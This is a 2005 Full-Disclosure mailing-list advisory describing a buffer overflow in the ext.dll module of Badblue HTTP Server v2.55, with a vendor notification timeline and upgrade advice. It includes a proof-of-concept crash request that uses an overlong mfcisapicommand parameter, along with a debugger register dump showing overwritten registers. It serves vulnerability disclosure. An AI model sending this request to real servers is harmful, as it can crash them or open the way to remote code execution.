[Full-Disclosure] Badblue HTTP Server, ext.dll buffer overflow
From: Andres Tarasco (atarasco_at_sia.es)
To: "'email@example.com'" <firstname.lastname@example.org> Date: Sat, 26 Feb 2005 18:30:16 +0100
SIA International Security Advisory - Badblue HTTP Server, ext.dll buffer
* Release DAte:
February 26, 2005
Working Resources Inc. http://www.badblue.com
* Versions Affected:
Confirmed under Badblue HTTP Server v2.55
Critical (Remote Code execution)
"BadBlue is not only a server, it's a complete file sharing system that is
simply easier and faster to use than anything else. Why? Because BadBlue
lets you use a tool you already know well: a web browser."
"In seconds, you can turn your PC into a powerful web server. You can easily
share photos, music, videos, and much more. With its simple menu-driven
interface and pop-up wizards to guide you through setup, there's no faster
way to share files"
* Technical Details:
SIA has discovered a buffer overflow in EXT.DLL, a module that handles
badblue http Requests. This buffer overflow triggers when an special crafted
HTTP Request is created.
Buffer overflow in EXT.DLL is triggered when a malicious http request that
contains a long mfcisapicommand parameter, with more than 250 chars, is
submitted. Some registers are overwritten so its possible to execute code or
cause a denial of service shutting down the server. The Following request
can be used to crash the remote server.
GET /ext.dll?mfcisapicommand=AAA...[250 chars]...AAA&page=index.htx
(360.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=026bda14 ebx=01130478 ecx=41414141 edx=0113057d esi=41414141
eip=10042004 esp=026bd8f4 ebp=026bdbe0 iopl=0 nv up ei pl nz na po
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
*** WARNING: Unable to verify checksum for E:\BadBlue\PE\ext.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
10042004 8b3e mov edi,[esi]
Succesfully exploitation of this flaw could allow remote code execution with
Upgrade to the lastest available version. At this time, vendor provides
version v2.6 that is available to download at
Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability
* Disclosure Timeline:
December 2004 - Discovered
December 20, 2004 - Initial Vendor Notification
December 21, 2004 - Initial Vender Response
January 3, 2005 - Vendor Patch released (v2.60)
February 26, 2005 - Public Disclosure
Full-Disclosure - We believe in it.